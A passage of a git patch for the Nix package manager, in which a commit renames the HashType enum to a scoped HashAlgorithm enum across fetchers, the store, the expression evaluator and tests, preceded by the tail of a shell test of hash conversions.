"$fail" == "error: input hash"*"exit: 1" ]] + } + try3 sha1 "800d59cfcd3c05e900cb4e214be48f6b886a08df" "vw46m23bizj4n8afrc0fj19wrp7mj3c0" "gA1Zz808BekAy04hS+SPa4hqCN8=" try3 sha256 "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" try3 sha512 "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" "12k9jiq29iyqm03swfsgiw5mlqs173qazm3n7daz43infy12pyrcdf30fkk3qwv4yl2ick8yipc2mqnlh48xsvvxl60lbx8vp38yji0" "IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ==" From 5334c9c792a208db4d3824e88019a626ded1b65d Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 14:20:27 +0100 Subject: [PATCH 059/654] HashType: Rename to HashAlgorithm To be consistent with CLI, nix API and many other references. As part of this, we also converted it to a scoped enum. https://github.com/NixOS/nix/issues/8876 --- perl/lib/Nix/Store.xs | 12 +- src/libexpr/flake/flake.cc | 2 +- src/libexpr/primops.cc | 36 ++--- src/libexpr/primops/fetchMercurial.cc | 4 +- src/libexpr/primops/fetchTree.cc | 8 +- src/libfetchers/fetchers.cc | 6 +- src/libfetchers/git-utils.cc | 4 +- src/libfetchers/git.cc | 6 +- src/libfetchers/github.cc | 10 +- src/libfetchers/indirect.cc | 4 +- src/libfetchers/input-accessor.cc | 4 +- src/libfetchers/mercurial.cc | 10 +- src/libfetchers/tarball.cc | 6 +- src/libstore/binary-cache-store.cc | 24 +-- src/libstore/binary-cache-store.hh | 16 +- src/libstore/build/local-derivation-goal.cc | 42 +++--- src/libstore/build/worker.cc | 4 +- src/libstore/builtins/fetchurl.cc | 4 +- src/libstore/content-address.cc | 28 ++-- src/libstore/content-address.hh | 4 +- src/libstore/daemon.cc | 16 +- src/libstore/derivations.cc | 64 ++++---- src/libstore/derivations.hh | 8 +- src/libstore/downstream-placeholder.cc | 4 +- src/libstore/export-import.cc | 6 +- src/libstore/gc.cc | 2 +- src/libstore/legacy-ssh-store.cc | 14 +- src/libstore/local-store.cc | 30 ++-- src/libstore/local-store.hh | 6 +- src/libstore/make-content-addressed.cc | 4 +- src/libstore/nar-info.cc | 4 +- src/libstore/optimise-store.cc | 4 +- src/libstore/path-references.cc | 2 +- src/libstore/path.cc | 2 +- src/libstore/remote-store.cc | 28 ++-- src/libstore/remote-store.hh | 14 +- src/libstore/store-api.cc | 46 +++--- src/libstore/store-api.hh | 22 +-- src/libstore/store-dir-config.hh | 2 +- src/libstore/worker-protocol.cc | 2 +- src/libutil/args.cc | 14 +- src/libutil/args.hh | 6 +- src/libutil/git.cc | 8 +- src/libutil/git.hh | 6 +- src/libutil/hash.cc | 158 ++++++++++---------- src/libutil/hash.hh | 38 ++--- src/libutil/references.cc | 4 +- src/libutil/references.hh | 2 +- src/libutil/source-accessor.cc | 8 +- src/libutil/source-accessor.hh | 6 +- src/nix-store/nix-store.cc | 12 +- src/nix/add-to-store.cc | 4 +- src/nix/hash.cc | 24 +-- src/nix/prefetch.cc | 34 ++--- src/nix/profile.cc | 2 +- src/nix/verify.cc | 2 +- tests/unit/libstore/common-protocol.cc | 8 +- tests/unit/libstore/derivation.cc | 4 +- tests/unit/libstore/nar-info.cc | 2 +- tests/unit/libstore/path-info.cc | 2 +- tests/unit/libstore/serve-protocol.cc | 8 +- tests/unit/libstore/worker-protocol.cc | 10 +- tests/unit/libutil/git.cc | 8 +- tests/unit/libutil/hash.cc | 16 +- 64 files changed, 450 insertions(+), 450 deletions(-) diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 40257ed74..50148141b 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -205,7 +205,7 @@ void importPaths(int fd, int dontCheckSigs) SV * hashPath(char * algo, int base32, char * path) PPCODE: try { - Hash h = hashPath(parseHashType(algo), path).first; + Hash h = hashPath(parseHashAlgo(algo), path).first; auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -216,7 +216,7 @@ SV * hashPath(char * algo, int base32, char * path) SV * hashFile(char * algo, int base32, char * path) PPCODE: try { - Hash h = hashFile(parseHashType(algo), path); + Hash h = hashFile(parseHashAlgo(algo), path); auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -227,7 +227,7 @@ SV * hashFile(char * algo, int base32, char * path) SV * hashString(char * algo, int base32, char * s) PPCODE: try { - Hash h = hashString(parseHashType(algo), s); + Hash h = hashString(parseHashAlgo(algo), s); auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -238,7 +238,7 @@ SV * hashString(char * algo, int base32, char * s) SV * convertHash(char * algo, char * s, int toBase32) PPCODE: try { - auto h = Hash::parseAny(s, parseHashType(algo)); + auto h = Hash::parseAny(s, parseHashAlgo(algo)); auto s = h.to_string(toBase32 ? HashFormat::Base32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -281,7 +281,7 @@ SV * addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - auto path = store()->addToStore(std::string(baseNameOf(srcPath)), srcPath, method, parseHashType(algo)); + auto path = store()->addToStore(std::string(baseNameOf(srcPath)), srcPath, method, parseHashAlgo(algo)); XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -291,7 +291,7 @@ SV * addToStore(char * srcPath, int recursive, char * algo) SV * makeFixedOutputPath(int recursive, char * algo, char * hash, char * name) PPCODE: try { - auto h = Hash::parseAny(hash, parseHashType(algo)); + auto h = Hash::parseAny(hash, parseHashAlgo(algo)); auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; auto path = store()->makeFixedOutputPath(name, FixedOutputInfo { .method = method, diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc index 8f8fc64f0..fee58792b 100644 --- a/src/libexpr/flake/flake.cc +++ b/src/libexpr/flake/flake.cc @@ -904,7 +904,7 @@ Fingerprint LockedFlake::getFingerprint() const // FIXME: as an optimization, if the flake contains a lock file // and we haven't changed it, then it's sufficient to use // flake.sourceInfo.storePath for the fingerprint. - return hashString(htSHA256, + return hashString(HashAlgorithm::SHA256, fmt("%s;%s;%d;%d;%s", flake.storePath.to_string(), flake.lockedRef.subdir, diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index c2499bdae..7831f3803 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1317,7 +1317,7 @@ drvName, Bindings * attrs, Value & v) .errPos = state.positions[noPos] })); - auto h = newHashAllowEmpty(*outputHash, parseHashTypeOpt(outputHashAlgo)); + auto h = newHashAllowEmpty(*outputHash, parseHashAlgoOpt(outputHashAlgo)); auto method = ingestionMethod.value_or(FileIngestionMethod::Flat); @@ -1339,7 +1339,7 @@ drvName, Bindings * attrs, Value & v) .errPos = state.positions[noPos] }); - auto ht = parseHashTypeOpt(outputHashAlgo).value_or(htSHA256); + auto ht = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); auto method = ingestionMethod.value_or(FileIngestionMethod::Recursive); for (auto & i : outputs) { @@ -1348,13 +1348,13 @@ drvName, Bindings * attrs, Value & v) drv.outputs.insert_or_assign(i, DerivationOutput::Impure { .method = method, - .hashType = ht, + .hashAlgo = ht, }); else drv.outputs.insert_or_assign(i, DerivationOutput::CAFloating { .method = method, - .hashType = ht, + .hashAlgo = ht, }); } } @@ -1754,17 +1754,17 @@ static RegisterPrimOp primop_findFile(PrimOp { /* Return the cryptographic hash of a file in base-16. */ static void prim_hashFile(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto type = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashFile"); - std::optional ht = parseHashType(type); - if (!ht) + auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashFile"); + std::optional ha = parseHashAlgo(algo); + if (!ha) state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash type '%1%'", type), + .msg = hintfmt("unknown hash algo '%1%'", algo), .errPos = state.positions[pos] })); auto path = realisePath(state, pos, *args[1]); - v.mkString(hashString(*ht, path.readFile()).to_string(HashFormat::Base16, false)); + v.mkString(hashString(*ha, path.readFile()).to_string(HashFormat::Base16, false)); } static RegisterPrimOp primop_hashFile({ @@ -2341,7 +2341,7 @@ static void prim_path(EvalState & state, const PosIdx pos, Value * * args, Value else if (n == "recursive") method = FileIngestionMethod { state.forceBool(*attr.value, attr.pos, "while evaluating the `recursive` attribute passed to builtins.path") }; else if (n == "sha256") - expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `sha256` attribute passed to builtins.path"), htSHA256); + expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `sha256` attribute passed to builtins.path"), HashAlgorithm::SHA256); else state.debugThrowLastTrace(EvalError({ .msg = hintfmt("unsupported argument '%1%' to 'addPath'", state.symbols[attr.name]), @@ -3766,18 +3766,18 @@ static RegisterPrimOp primop_stringLength({ /* Return the cryptographic hash of a string in base-16. */ static void prim_hashString(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto type = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashString"); - std::optional ht = parseHashType(type); - if (!ht) + auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashString"); + std::optional ha = parseHashAlgo(algo); + if (!ha) state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash type '%1%'", type), + .msg = hintfmt("unknown hash algo '%1%'", algo), .errPos = state.positions[pos] })); NixStringContext context; // discarded auto s = state.forceString(*args[1], context, pos, "while evaluating the second argument passed to builtins.hashString"); - v.mkString(hashString(*ht, s).to_string(HashFormat::Base16, false)); + v.mkString(hashString(*ha, s).to_string(HashFormat::Base16, false)); } static RegisterPrimOp primop_hashString({ @@ -3800,15 +3800,15 @@ static void prim_convertHash(EvalState & state, const PosIdx pos, Value * * args auto hash = state.forceStringNoCtx(*iteratorHash->value, pos, "while evaluating the attribute 'hash'"); Bindings::iterator iteratorHashAlgo = inputAttrs->find(state.symbols.create("hashAlgo")); - std::optional ht = std::nullopt; + std::optional ha = std::nullopt; if (iteratorHashAlgo != inputAttrs->end()) { - ht = parseHashType(state.forceStringNoCtx(*iteratorHashAlgo->value, pos, "while evaluating the attribute 'hashAlgo'")); + ha = parseHashAlgo(state.forceStringNoCtx(*iteratorHashAlgo->value, pos, "while evaluating the attribute 'hashAlgo'")); } Bindings::iterator iteratorToHashFormat = getAttr(state, state.symbols.create("toHashFormat"), args[0]->attrs, "while locating the attribute 'toHashFormat'"); HashFormat hf = parseHashFormat(state.forceStringNoCtx(*iteratorToHashFormat->value, pos, "while evaluating the attribute 'toHashFormat'")); - v.mkString(Hash::parseAny(hash, ht).to_string(hf, hf == HashFormat::SRI)); + v.mkString(Hash::parseAny(hash, ha).to_string(hf, hf == HashFormat::SRI)); } static RegisterPrimOp primop_convertHash({ diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc index e76ce455d..58fe6f173 100644 --- a/src/libexpr/primops/fetchMercurial.cc +++ b/src/libexpr/primops/fetchMercurial.cc @@ -31,7 +31,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a // be both a revision or a branch/tag name. auto value = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `rev` attribute passed to builtins.fetchMercurial"); if (std::regex_match(value.begin(), value.end(), revRegex)) - rev = Hash::parseAny(value, htSHA1); + rev = Hash::parseAny(value, HashAlgorithm::SHA1); else ref = value; } @@ -79,7 +79,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a attrs2.alloc("branch").mkString(*input2.getRef()); // Backward compatibility: set 'rev' to // 0000000000000000000000000000000000000000 for a dirty tree. - auto rev2 = input2.getRev().value_or(Hash(htSHA1)); + auto rev2 = input2.getRev().value_or(Hash(HashAlgorithm::SHA1)); attrs2.alloc("rev").mkString(rev2.gitRev()); attrs2.alloc("shortRev").mkString(rev2.gitRev().substr(0, 12)); if (auto revCount = input2.getRevCount()) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 383ec7c58..ef80c634f 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -46,7 +46,7 @@ void emitTreeAttrs( attrs.alloc("shortRev").mkString(rev->gitShortRev()); } else if (emptyRevFallback) { // Backwards compat for `builtins.fetchGit`: dirty repos return an empty sha1 as rev - auto emptyHash = Hash(htSHA1); + auto emptyHash = Hash(HashAlgorithm::SHA1); attrs.alloc("rev").mkString(emptyHash.gitRev()); attrs.alloc("shortRev").mkString(emptyHash.gitShortRev()); } @@ -246,7 +246,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v if (n == "url") url = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the url we should fetch"); else if (n == "sha256") - expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the sha256 of the content we should fetch"), htSHA256); + expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the sha256 of the content we should fetch"), HashAlgorithm::SHA256); else if (n == "name") name = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the name of the content we should fetch"); else @@ -276,7 +276,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v state.debugThrowLastTrace(EvalError("in pure evaluation mode, '%s' requires a 'sha256' argument", who)); // early exit if pinned and already in the store - if (expectedHash && expectedHash->type == htSHA256) { + if (expectedHash && expectedHash->algo == HashAlgorithm::SHA256) { auto expectedPath = state.store->makeFixedOutputPath( name, FixedOutputInfo { @@ -301,7 +301,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v if (expectedHash) { auto hash = unpack ? state.store->queryPathInfo(storePath)->narHash - : hashFile(htSHA256, state.store->toRealPath(storePath)); + : hashFile(HashAlgorithm::SHA256, state.store->toRealPath(storePath)); if (hash != *expectedHash) state.debugThrowLastTrace(EvalError((unsigned int) 102, "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", *url, expectedHash->to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true))); diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index 60208619e..573341a3d 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -289,8 +289,8 @@ std::string Input::getType() const std::optional Input::getNarHash() const { if (auto s = maybeGetStrAttr(attrs, "narHash")) { - auto hash = s->empty() ? Hash(htSHA256) : Hash::parseSRI(*s); - if (hash.type != htSHA256) + auto hash = s->empty() ? Hash(HashAlgorithm::SHA256) : Hash::parseSRI(*s); + if (hash.algo != HashAlgorithm::SHA256) throw UsageError("narHash must use SHA-256"); return hash; } @@ -314,7 +314,7 @@ std::optional Input::getRev() const } catch (BadHash &e) { // Default to sha1 for backwards compatibility with existing // usages (e.g. `builtins.fetchTree` calls or flake inputs). - hash = Hash::parseAny(*s, htSHA1); + hash = Hash::parseAny(*s, HashAlgorithm::SHA1); } } diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 19eae0e1d..9356e5817 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -91,7 +91,7 @@ Hash toHash(const git_oid & oid) #ifdef GIT_EXPERIMENTAL_SHA256 assert(oid.type == GIT_OID_SHA1); #endif - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); memcpy(hash.hash, oid.id, hash.hashSize); return hash; } @@ -439,7 +439,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this std::string re = R"(Good "git" signature for \* with .* key SHA256:[)"; for (const fetchers::PublicKey & k : publicKeys){ // Calculate sha256 fingerprint from public key and escape the regex symbol '+' to match the key literally - auto fingerprint = trim(hashString(htSHA256, base64Decode(k.key)).to_string(nix::HashFormat::Base64, false), "="); + auto fingerprint = trim(hashString(HashAlgorithm::SHA256, base64Decode(k.key)).to_string(nix::HashFormat::Base64, false), "="); auto escaped_fingerprint = std::regex_replace(fingerprint, std::regex("\\+"), "\\+" ); re += "(" + escaped_fingerprint + ")"; } diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 8cd74057c..a89acc1c0 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -52,7 +52,7 @@ bool touchCacheFile(const Path & path, time_t touch_time) Path getCachePath(std::string_view key) { return getCacheDir() + "/nix/gitv3/" + - hashString(htSHA256, key).to_string(HashFormat::Base32, false); + hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Base32, false); } // Returns the name of the HEAD branch. @@ -369,7 +369,7 @@ struct GitInputScheme : InputScheme { auto checkHashType = [&](const std::optional & hash) { - if (hash.has_value() && !(hash->type == htSHA1 || hash->type == htSHA256)) + if (hash.has_value() && !(hash->algo == HashAlgorithm::SHA1 || hash->algo == HashAlgorithm::SHA256)) throw Error("Hash '%s' is not supported by Git. Supported types are sha1 and sha256.", hash->to_string(HashFormat::Base16, true)); }; @@ -559,7 +559,7 @@ struct GitInputScheme : InputScheme repoInfo.url ); } else - input.attrs.insert_or_assign("rev", Hash::parseAny(chomp(readFile(localRefFile)), htSHA1).gitRev()); + input.attrs.insert_or_assign("rev", Hash::parseAny(chomp(readFile(localRefFile)), HashAlgorithm::SHA1).gitRev()); // cache dir lock is removed at scope end; we will only use read-only operations on specific revisions in the remainder } diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index 661ad4884..70acb9354 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -42,7 +42,7 @@ struct GitArchiveInputScheme : InputScheme auto size = path.size(); if (size == 3) { if (std::regex_match(path[2], revRegex)) - rev = Hash::parseAny(path[2], htSHA1); + rev = Hash::parseAny(path[2], HashAlgorithm::SHA1); else if (std::regex_match(path[2], refRegex)) ref = path[2]; else @@ -68,7 +68,7 @@ struct GitArchiveInputScheme : InputScheme if (name == "rev") { if (rev) throw BadURL("URL '%s' contains multiple commit hashes", url.url); - rev = Hash::parseAny(value, htSHA1); + rev = Hash::parseAny(value, HashAlgorithm::SHA1); } else if (name == "ref") { if (!std::regex_match(value, refRegex)) @@ -284,7 +284,7 @@ struct GitHubInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string { json["sha"] }, htSHA1); + auto rev = Hash::parseAny(std::string { json["sha"] }, HashAlgorithm::SHA1); debug("HEAD revision for '%s' is %s", url, rev.gitRev()); return rev; } @@ -356,7 +356,7 @@ struct GitLabInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string(json[0]["id"]), htSHA1); + auto rev = Hash::parseAny(std::string(json[0]["id"]), HashAlgorithm::SHA1); debug("HEAD revision for '%s' is %s", url, rev.gitRev()); return rev; } @@ -448,7 +448,7 @@ struct SourceHutInputScheme : GitArchiveInputScheme if(!id) throw BadURL("in '%d', couldn't find ref '%d'", input.to_string(), ref); - auto rev = Hash::parseAny(*id, htSHA1); + auto rev = Hash::parseAny(*id, HashAlgorithm::SHA1); debug("HEAD revision for '%s' is %s", fmt("%s/%s", base_url, ref), rev.gitRev()); return rev; } diff --git a/src/libfetchers/indirect.cc b/src/libfetchers/indirect.cc index 8e30284c6..002c0c292 100644 --- a/src/libfetchers/indirect.cc +++ b/src/libfetchers/indirect.cc @@ -20,7 +20,7 @@ struct IndirectInputScheme : InputScheme if (path.size() == 1) { } else if (path.size() == 2) { if (std::regex_match(path[1], revRegex)) - rev = Hash::parseAny(path[1], htSHA1); + rev = Hash::parseAny(path[1], HashAlgorithm::SHA1); else if (std::regex_match(path[1], refRegex)) ref = path[1]; else @@ -31,7 +31,7 @@ struct IndirectInputScheme : InputScheme ref = path[1]; if (!std::regex_match(path[2], revRegex)) throw BadURL("in flake URL '%s', '%s' is not a commit hash", url.url, path[2]); - rev = Hash::parseAny(path[2], htSHA1); + rev = Hash::parseAny(path[2], HashAlgorithm::SHA1); } else throw BadURL("GitHub URL '%s' is invalid", url.url); diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc index 85dc4609f..eabef55d8 100644 --- a/src/libfetchers/input-accessor.cc +++ b/src/libfetchers/input-accessor.cc @@ -44,8 +44,8 @@ StorePath InputAccessor::fetchToStore( auto storePath = settings.readOnlyMode - ? store->computeStorePathFromDump(*source, name, method, htSHA256).first - : store->addToStoreFromDump(*source, name, method, htSHA256, repair); + ? store->computeStorePathFromDump(*source, name, method, HashAlgorithm::SHA256).first + : store->addToStoreFromDump(*source, name, method, HashAlgorithm::SHA256, repair); if (cacheKey) fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index aa991a75d..713f24bbb 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -210,7 +210,7 @@ struct MercurialInputScheme : InputScheme return files.count(file); }; - auto storePath = store->addToStore(input.getName(), actualPath, FileIngestionMethod::Recursive, htSHA256, filter); + auto storePath = store->addToStore(input.getName(), actualPath, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, filter); return {std::move(storePath), input}; } @@ -220,7 +220,7 @@ struct MercurialInputScheme : InputScheme auto checkHashType = [&](const std::optional & hash) { - if (hash.has_value() && hash->type != htSHA1) + if (hash.has_value() && hash->algo != HashAlgorithm::SHA1) throw Error("Hash '%s' is not supported by Mercurial. Only sha1 is supported.", hash->to_string(HashFormat::Base16, true)); }; @@ -260,14 +260,14 @@ struct MercurialInputScheme : InputScheme }); if (auto res = getCache()->lookup(store, unlockedAttrs)) { - auto rev2 = Hash::parseAny(getStrAttr(res->first, "rev"), htSHA1); + auto rev2 = Hash::parseAny(getStrAttr(res->first, "rev"), HashAlgorithm::SHA1); if (!input.getRev() || input.getRev() == rev2) { input.attrs.insert_or_assign("rev", rev2.gitRev()); return makeResult(res->first, std::move(res->second)); } } - Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(htSHA256, actualUrl).to_string(HashFormat::Base32, false)); + Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(HashAlgorithm::SHA256, actualUrl).to_string(HashFormat::Base32, false)); /* If this is a commit hash that we already have, we don't have to pull again. */ @@ -301,7 +301,7 @@ struct MercurialInputScheme : InputScheme runHg({ "log", "-R", cacheDir, "-r", revOrRef, "--template", "{node} {rev} {branch}" })); assert(tokens.size() == 3); - input.attrs.insert_or_assign("rev", Hash::parseAny(tokens[0], htSHA1).gitRev()); + input.attrs.insert_or_assign("rev", Hash::parseAny(tokens[0], HashAlgorithm::SHA1).gitRev()); auto revCount = std::stoull(tokens[1]); input.attrs.insert_or_assign("ref", tokens[2]); diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc index 0062878a9..086366180 100644 --- a/src/libfetchers/tarball.cc +++ b/src/libfetchers/tarball.cc @@ -73,7 +73,7 @@ DownloadFileResult downloadFile( } else { StringSink sink; dumpString(res.data, sink); - auto hash = hashString(htSHA256, res.data); + auto hash = hashString(HashAlgorithm::SHA256, res.data); ValidPathInfo info { *store, name, @@ -82,7 +82,7 @@ DownloadFileResult downloadFile( .hash = hash, .references = {}, }, - hashString(htSHA256, sink.s), + hashString(HashAlgorithm::SHA256, sink.s), }; info.narSize = sink.s.size(); auto source = StringSource { sink.s }; @@ -156,7 +156,7 @@ DownloadTarballResult downloadTarball( throw nix::Error("tarball '%s' contains an unexpected number of top-level files", url); auto topDir = tmpDir + "/" + members.begin()->name; lastModified = lstat(topDir).st_mtime; - unpackedStorePath = store->addToStore(name, topDir, FileIngestionMethod::Recursive, htSHA256, defaultPathFilter, NoRepair); + unpackedStorePath = store->addToStore(name, topDir, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, defaultPathFilter, NoRepair); } Attrs infoAttrs({ diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index ae483c95e..f287d72a8 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -143,9 +143,9 @@ ref BinaryCacheStore::addToStoreCommon( /* Read the NAR simultaneously into a CompressionSink+FileSink (to write the compressed NAR to disk), into a HashSink (to get the NAR hash), and into a NarAccessor (to get the NAR listing). */ - HashSink fileHashSink { htSHA256 }; + HashSink fileHashSink { HashAlgorithm::SHA256 }; std::shared_ptr narAccessor; - HashSink narHashSink { htSHA256 }; + HashSink narHashSink { HashAlgorithm::SHA256 }; { FdSink fileSink(fdTemp.get()); TeeSink teeSinkCompressed { fileSink, fileHashSink }; @@ -301,9 +301,9 @@ void BinaryCacheStore::addToStore(const ValidPathInfo & info, Source & narSource } StorePath BinaryCacheStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) { - if (method != FileIngestionMethod::Recursive || hashAlgo != htSHA256) + if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) unsupported("addToStoreFromDump"); return addToStoreCommon(dump, repair, CheckSigs, [&](HashResult nar) { ValidPathInfo info { @@ -399,13 +399,13 @@ void BinaryCacheStore::queryPathInfoUncached(const StorePath & storePath, } StorePath BinaryCacheStore::addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) { /* FIXME: Make BinaryCacheStore::addToStoreCommon support non-recursive+sha256 so we can just use the default @@ -448,7 +448,7 @@ StorePath BinaryCacheStore::addTextToStore( const StorePathSet & references, RepairFlag repair) { - auto textHash = hashString(htSHA256, s); + auto textHash = hashString(HashAlgorithm::SHA256, s); auto path = makeTextPath(name, TextInfo { { textHash }, references }); if (!repair && isValidPath(path)) diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index cea2a571f..395e1b479 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -124,16 +124,16 @@ public: RepairFlag repair, CheckSigsFlag checkSigs) override; StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) override; + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override; + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override; StorePath addTextToStore( std::string_view name, diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 198402ff7..4c3dc1f5c 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1066,7 +1066,7 @@ void LocalDerivationGoal::initTmpDir() { if (passAsFile.find(i.first) == passAsFile.end()) { env[i.first] = i.second; } else { - auto hash = hashString(htSHA256, i.first); + auto hash = hashString(HashAlgorithm::SHA256, i.first); std::string fn = ".attr-" + hash.to_string(HashFormat::Base32, false); Path p = tmpDir + "/" + fn; writeFile(p, rewriteStrings(i.second, inputRewrites)); @@ -1290,13 +1290,13 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In { throw Error("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override { throw Error("addToStore"); } void addToStore(const ValidPathInfo & info, Source & narSource, @@ -1318,12 +1318,12 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In } StorePath addToStoreFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashType hashAlgo, - RepairFlag repair, - const StorePathSet & references) override + Source & dump, + std::string_view name, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + RepairFlag repair, + const StorePathSet & references) override { auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, repair, references); goal.addDependency(path); @@ -2466,7 +2466,7 @@ SingleDrvOutputs 